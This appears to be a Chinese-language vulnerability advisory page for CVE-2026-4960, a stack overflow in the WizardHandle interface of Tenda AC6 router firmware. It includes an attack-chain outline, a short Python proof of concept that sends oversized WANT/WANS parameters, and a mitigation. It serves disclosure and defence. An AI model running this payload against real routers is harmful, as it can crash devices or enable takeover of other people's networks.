IPBUF安全漏洞报告
English
CVE-2026-4960 CVSS 8.8 高危

CVE-2026-4960 Tenda AC6路由器栈溢出漏洞

披露日期: 2026-03-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4960
漏洞类型
栈缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda AC6

相关标签

栈溢出Tenda AC6远程代码执行IoT安全缓冲区溢出

漏洞概述

Tenda AC6 15.03.05.16版本的/goform/WizardHandle接口存在栈溢出漏洞。攻击者可通过篡改POST请求中的WANT/WANS参数触发该漏洞,导致缓冲区溢出。由于无需用户交互且可远程利用,攻击者可能造成设备崩溃或执行任意代码,严重影响路由器的机密性、完整性和可用性。

技术细节

该漏洞源于Tenda AC6路由器在处理WizardHandle POST请求时,未对WANT/WANS参数进行严格的长度边界检查。在函数fromWizardHandle中,程序直接将用户输入的数据复制到栈上的固定大小缓冲区中。当传入超长字符串时,数据会覆盖返回地址或其他栈变量。由于CVSS向量显示需要低权限(PR:L),攻击者通常需要先获取路由器的低权限账户登录凭证,然后构造特制的HTTP POST包发送至/goform/WizardHandle接口,从而控制程序执行流程,实现远程代码执行(RCE)。

攻击链分析

STEP 1
信息收集
识别目标设备为Tenda AC6路由器,并确认为受影响版本15.03.05.16。
STEP 2
获取权限
利用弱口令或其他方式获取路由器Web界面的低权限账户凭证(PR:L)。
STEP 3
发送攻击载荷
构造包含超长WANT/WANS参数的恶意POST请求,发送至/goform/WizardHandle接口。
STEP 4
触发溢出
程序未校验参数长度,导致数据覆盖栈上的返回地址,引发缓冲区溢出。
STEP 5
执行代码或拒绝服务
控制程序执行流程以执行任意代码,或导致设备崩溃(DoS)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_tenda_ac6(target_ip): """ PoC for CVE-2026-4960 Triggers stack overflow in Tenda AC6 via WizardHandle """ url = f"http://{target_ip}/goform/WizardHandle" # Malicious payload to trigger buffer overflow # Adjust length based on specific buffer size analysis overflow_payload = "A" * 1000 data = { "WANT": overflow_payload, "WANS": overflow_payload } try: # Sending the malicious POST request # Note: Low privileges (PR:L) might be required response = requests.post(url, data=data, timeout=5) print(f"Request sent to {target_ip}, Status: {response.status_code}") except Exception as e: print(f"Exploit attempt failed: {e}") if __name__ == "__main__": # Replace with actual target IP exploit_tenda_ac6("192.168.0.1")

影响范围

Tenda AC6 15.03.05.16

防御指南

临时缓解措施
若暂无法升级固件,建议禁用路由器的远程Web管理功能,并在内网通过访问控制列表(ACL)严格限制对管理端口(通常为80或443)的访问,仅允许维护终端连接。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表